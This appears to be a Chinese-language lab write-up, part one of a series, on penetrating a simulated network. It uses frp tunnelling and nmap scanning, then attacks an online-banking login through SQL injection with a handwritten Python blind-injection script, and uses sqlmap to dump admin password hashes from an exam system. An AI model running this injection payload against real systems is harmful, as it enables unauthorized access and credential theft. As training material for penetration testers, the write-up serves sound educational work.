域渗透之外网打点到三层内网(一)

简介: 域渗透之外网打点到三层内网

环境搭建

1.项目介绍:

本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。


2.VPS映射

1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini

2aff0ec2b0dbe1aced76b7368dc623c2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在web1上配置frpc.ini 运行 frpc.exe -c frp.ini

dd65ff8741563403c989362e60eb6e0a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


成功访问到环境

http://x.x.x.x:8088/login.jsp

9de5ea9ad0c168b6ecb42561c0fb196f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

信息收集

1.端口探测

6a994d9f489dae1c449319e60bd2afce_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。

b510f8c2db63cbbffd8bf2aa8d5feb80_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后查看其详细信息。

e151a6383e51daec8f3f999a57424ffb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.网站源代码查找

发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。

fdbddc0fef68ed5c6e8a06f9d149b4c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后就在github试试运气,发现了源码。

41858841ff4441dd0ca0e3f956bbb2d4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

源码地址:

https://github.com/amateur-RD/netBank-System

67a0b9e98f27dbb98d9d06f2bf6a6f08_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。

d8cfcc0523e847d6ec5204aae0eb04d5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.SQL注入

然后进行登录测试,发现存在sql注入漏洞

edcf72c564e1611bfa927c4760765612_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

网上银行系统Hsql注入漏洞

bfc9119fcf25573463b9d6653c57e3ee_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap不能进行跑出用户名和密码。

0e45c256824eb6863618e93358db8f6c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.编写脚本进行sql注入

#coding:utf-8
import requests
password=""
url="http://x.x.x.x:8878/admin/login"
payload="0123456789abcdefghijklmnopqrstuvwxyz"
password=""
for i in range(1,20):
 for j in payload:
   exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'
or '1'='" %(i,j)
   print("正在注入")
   data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}
   req = requests.post(url=url, data=data);
   if "密码不正确" in req.text:
     password+=j
     break
print(password)

成功跑出密码。然后进行登录。

391503681959472764b2ad92b5b62fba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。

d06c2d4490b3ff87bc66da682901d163_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.tomexam SQL注入漏洞

在另一个地址处,发现可以注册用户。然后注册用户进行登录。

3b210cabaeb3928ac45e94338f417b20_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后发现,某处存在sql注入。

634c041aa3d03553a067dcfeaf8c394d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6b6950baa039d2828ef498a451a43e0d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap进行获取用户信息。

057ef2867bb314471cbf7fbc2bf66403_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

944fc8fce8c0b71466dc597d1e8ddb95_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

| 1  | 1      | 1399999999 | 1      | 超级管理员 | admin    | admin    | 17D03DA6474CE8BEB13B01E79F789E63       | 2022-04-09 00:14:08 | 301        |
| 6  | 2      |     | 1      |     | eu3      | eu3      | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14


成功抓到了管理员用户和密码,然后使用md5进行解密。

c93f2d33fd14d4cc8c326f8eb5f805a5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功进行登录。登录之后没有找到可getshell的地方。

f1d8ee3cc8c9ca6371e64604f432aca6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



相关文章
|
9月前
|
存储 安全 网络协议
《内网安全攻防》内网信息收集
《内网安全攻防》内网信息收集
63 0
|
9月前
|
存储 安全 网络安全
《内网安全攻防》DMZ访问控制策略(干货!)
《内网安全攻防》DMZ访问控制策略(干货!)
270 0
|
域名解析 缓存 负载均衡
网络拾遗之 DNS协议:网络世界的地址簿
网络拾遗之 DNS协议:网络世界的地址簿
|
安全 Java 关系型数据库
域渗透之外网打点到三层内网(二)
域渗透之外网打点到三层内网
158 0
域渗透之外网打点到三层内网(二)
|
SQL 安全 网络协议
域渗透之外网打点到三层内网(三)
域渗透之外网打点到三层内网
206 0
域渗透之外网打点到三层内网(三)
|
负载均衡 网络协议 算法
跨区域网络的通信学习静态路由
跨区域网络的通信学习静态路由
427 0
跨区域网络的通信学习静态路由
|
缓存 网络协议 网络架构
跨网段通信过程
原因:封装3层:源IP、目的IP不变,封装2层:源MAC封装接口F0/1的MAC地址(192.168.1.100),目的MAC封装目的IP的MAC地址(192.168.2100),路由器去ARP缓存表中找到对应的地址,成功重新封装ICMP包并存F0/1中转发出去。步骤九:路由器从F0/0重新封装并转发的ICMP回应包原因:路由器收到PC2发表的ICMP回应包,逐层解封装(解封装2层,目的MAC是路由器自己接口的MAC地址,连续解封装3层,目的IP不是路由器自己的IP,根据目的IP 192.168.1.1与路由器中的每一个路由条目进行与运算,找到匹配的路由条目,根据该匹配的路由表重新封装。封装I
跨网段通信过程
|
网络协议 测试技术 网络架构
双网卡双线路DNS解析分析
在企业网络维护过程中我们经常会遇到这样或那样的奇怪问题,而很多问题需要有深厚的理论知识才能解决。而随着网络的飞速发展越来越多的中小企业开始尝试通过多条线路来保证网络的畅通,一方面双网卡下的双线接入可以保证我们的速度有所提升,彻底解决网通与电信双网交叉访问问题;另一方面双线接入保证企业网络即使有一条线路出现问题另外一条也可以马上接管工作,从而保证企业网络畅通无阻,为企业外网接入提供冗余功能。
2367 0
【计算机网络】网络层 : 移动 IP 技术 ( 移动节点 | 本地代理 | 外部代理 | 永久地址 | 转交地址 | 移动 IP 通信过程 )
【计算机网络】网络层 : 移动 IP 技术 ( 移动节点 | 本地代理 | 外部代理 | 永久地址 | 转交地址 | 移动 IP 通信过程 )
892 0
|
Kubernetes 应用服务中间件 nginx
深入玩转K8S之外网如何访问业务应用
有一个问题就是现在我的业务分配在多个Pod上,那么如果我某个Pod死掉岂不是业务完蛋了,当然也会有人说Pod死掉没问题啊,K8S自身机制Deployment和Controller会动态的创建和销毁Pod来保证应用的整体稳定性,那这时候还会有问题,那就是每个Pod产生的IP都是动态的,那所以说重新启动了我对外访问的IP岂不是要变了,别急,下面我们来解决下这个问题。
2881 0